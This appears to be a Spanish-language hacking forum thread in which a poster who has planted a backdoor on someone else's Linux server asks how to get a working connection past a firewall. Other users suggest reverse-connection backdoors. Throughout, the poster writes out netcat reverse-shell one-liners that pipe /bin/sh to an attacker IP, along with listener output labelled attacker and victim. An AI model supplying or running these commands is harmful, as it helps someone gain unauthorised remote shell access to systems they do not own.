Hola, resulta que en un servidor subo una backdoor, para luego conectar por telnet, pero no puedo conectar, porq no se abre el puerto, supongo k sera porq usan firewall o estan detras de un router? :S que podria hacer para k la backdoor funcionase? Gracias

Me parece que existe un backdoor que hace conexion inversa..buscalo, yo lo vi publicado por darkbicho

El servidor tiene netcat lo k he hecho a sido poner esto en el servidor linux: nc miip 1337| /bin/sh | nc miip 31337 y luego en mi pc nc -vv -l -p 1337 y nc -vv -l -p 31337 pero se keda escuchando y no pasa nada, esto lo he leido aqui: http://foro.elhacker.net/index.php/topic,84461.0.html a ver si alguien me hecha un cable, gracias.

al poner nc -e /bin/sh <tu IP> 6000 me dice k no es correcta la sintaxis, probe lo k dije antes solo con el puerto 25 y me salio esto: C:\Documents and Settings\yo\Escritorio\netcat>nc -l -n -v -p 25
listening on [any] 25 ...
connect to [ipatacante] from (UNKNOWN) [ipvictima] 51104

luego me salio el directorio otra vez, no me aparecio ninguna shell, tal vez sea porq tienen que ser las dos maquinas linux? porq la mia es win xp sp2, y el otro ekipo es un linux, es por eso?

pongo el comando nc -vv -L -p 6000 en mi makina, y me sale esto:
C:\Documents and Settings\yo\Escritorio\netcat>nc -vv -L -p 6000
listening on [any] 6000 ...

(se supone k esta escuchando)

Luego voy a la makina linux y pongo esto otro: nc -e /bin/sh miip 6000

y me sale esto: nc -h for help

(supongo k el comando estara mal escrito por eso me sale eso)

al poner lo k dije antes de poner en mi makina esto: nc -l -n -v -p 25

(se me pone a escuchar como antes)

y pongo en la makina linux esto otro: nc miip 25 | /bin/sh

y me aparece en mi makina windows, esto:
C:\Documents and Settings\yo\Escritorio\netcat>nc -l -n -v -p 25
listening on [any] 25 ...
connect to [ipatacante] from (UNKNOWN) [ipvictima] 51104

(es de la unica forma en la k se a recibido una "respuesta" pero no me da shell, vuelve a mi directorio de win)

P.D: Tambien he probado estas dos formas de linux a linux, y nada, me sigue pasando lo mismo.

[v1.10]
connect to somewhere:   nc [-options] hostname port [ports] ...
listen for inbound:   nc -l -p port [-options] [hostname] [port]
options:
   -g gateway      source-routing hop point, up to 8
   -G num         source-routing pointer: 4, 8, 12, ...
   -h         this cruft
   -i secs         delay interval for lines sent, ports scanned
   -l         listen mode, for inbound connects
   -n         numeric-only IP addresses, no DNS
   -o file         hex dump of traffic
   -p port         local port number
   -r         randomize local and remote ports
   -s addr         local source address
   -u         UDP mode
   -v         verbose [use twice to be more verbose]
   -w secs         timeout for connects and final net reads
   -z         zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]


Tal vez esk la opcion -e esta capada? (en el servidor linux tengo permisos nobody) no puedo reinstalar el netcat.

No funciona el wget xD; tengo acceso al ftp, pero no creo k sirva de mucho, k mala suerte tengo :S, supongo k el troyano k decia Colymore, funcionara haciendo uso del netcat no?

E estado mriando de nuevo lo que estabas aciendo con el netcat, y..me parece que el problema es de tu PC porque si realizas conexion iinversa, cuando tu ejecutas el netcat en la makina victima funciona a la perfeccion e intenta acer conexion verdad??
O tal vez no permite conexiones salientes por X rango de puertos...son suposiciones, me parece que me ekivoko pero..nuse.saludos